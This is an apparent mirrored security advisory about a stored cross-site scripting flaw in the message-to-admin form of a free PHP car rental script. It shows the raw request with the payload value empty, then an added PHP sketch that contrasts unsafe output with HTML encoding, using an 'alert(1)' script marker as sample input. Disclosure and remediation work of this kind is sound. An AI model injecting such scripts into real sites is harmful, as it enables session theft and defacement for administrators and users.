Car Rental Script Cross Site Scripting ≈ Packet Storm – Digitalmunition





Published on August 14th, 2020


====================================================================
Car Rental Script – Stored XSS
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date : 8/7/2020
.:. Tested on : Windows 10 64 bit environment || XAMPP
####################################################################

Description: The application allows an authenticated user to send a message to the application administrator. The message parameter is vulnerable to XSS injection.

===[ Exploit ]===

Stored Cross Site Scripting
=================================

I. Persistent XSS

POST /testing/message_admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/testing/message_admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=noml4n6pvqi6tn83i8quqebtva
Connection: close
Upgrade-Insecure-Requests: 1

message=&send=Send+Message
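
Mitigation sketch (an added example, not the vendor's code and not part of the original advisory): the stored message is HTML-encoded when the administrator's page renders it. Table, column and function names are hypothetical, and an in-memory SQLite database (PDO with pdo_sqlite) stands in for the application's MySQL backend.

```php
<?php
declare(strict_types=1);
// Added example; table, column and function names are hypothetical.

// In-memory SQLite stands in for the application's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE message (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

// Store the message as submitted; a prepared statement keeps it out of the SQL text.
function store_message(PDO $db, string $body): void
{
    $body = trim($body);
    if ($body === '' || strlen($body) > 1000) {
        throw new InvalidArgumentException('message must be 1-1000 bytes');
    }
    $db->prepare('INSERT INTO message (body) VALUES (?)')->execute([$body]);
}

// Vulnerable pattern: stored text is concatenated into the admin page as HTML.
function render_unsafe(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT body FROM message') as $row) {
        $html .= '<li>' . $row['body'] . "</li>\n";
    }
    return $html;
}

// Hardened pattern: encode for the HTML context at output time.
function render_safe(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT body FROM message') as $row) {
        $body = htmlspecialchars($row['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= '<li>' . $body . "</li>\n";
    }
    return $html;
}

// Constructed sample input: a harmless marker that would execute if rendered raw.
store_message($db, '<script>alert(1)</script>');
echo 'unsafe: ', render_unsafe($db);
echo 'safe:   ', render_safe($db);
```

Encoding at output rather than at storage keeps the database copy intact and protects every page that later displays the message, provided each one encodes for its own context.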
